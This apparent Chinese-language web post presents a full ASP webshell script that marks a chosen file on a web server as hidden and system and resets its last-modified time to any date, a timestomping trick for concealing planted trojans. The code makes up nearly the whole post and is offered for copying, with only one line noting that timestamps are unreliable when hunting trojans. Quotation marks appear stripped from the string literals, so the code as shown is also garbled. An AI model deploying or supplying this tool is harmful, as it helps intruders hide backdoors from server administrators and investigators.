隱藏並修改檔案的最後修改時間的aspshell,所有大家以後在尋找木馬的時候不能簡單的根據時間來判斷。複製代碼代碼如下:
<%
'隱藏並修改檔案的最後修改時間的aspshell
'原理:透過FSO可以修改檔案的屬性,例如設定為唯讀,隱藏,系統等等;FSO中的attributes屬性修改檔案屬性,1只讀,2隱藏,4系統文件
' 透過shell.application可以為檔案重新設定一個最後修改時間
'2009/02/24 write 由 skyfire
response.write <form method=post>
response.write 路徑:<input name=path value='&server.mappath(/)&' size='30'>(一定要以/結尾)<br />
response.write 檔案名稱:<input name=filename value='test.txt' size='30'><br />
response.write 修改時間:<input name=time value='12/30/2099 12:30:30' size='30'><br />
response.write <input type=submit value=修改並隱藏檔案>
response.write </form>
'取得提交的參數
set path=request.Form(path)
set fileName=request.Form(filename)
set newTime=request.Form(time)
if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
'透過fso設定檔案屬性
Set fso=Server.CreateObject(Scripting.FileSystemObject)
Set file=fso.getFile(path&fileName)
file.attributes=2+4 '設定檔案屬性為隱藏+系統
'透過shell.Application修改檔案的最後修改時間
Set shell=Server.CreateObject(Shell.Application)
Set app_path=shell.NameSpace(server.mappath(.))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime
end if
%>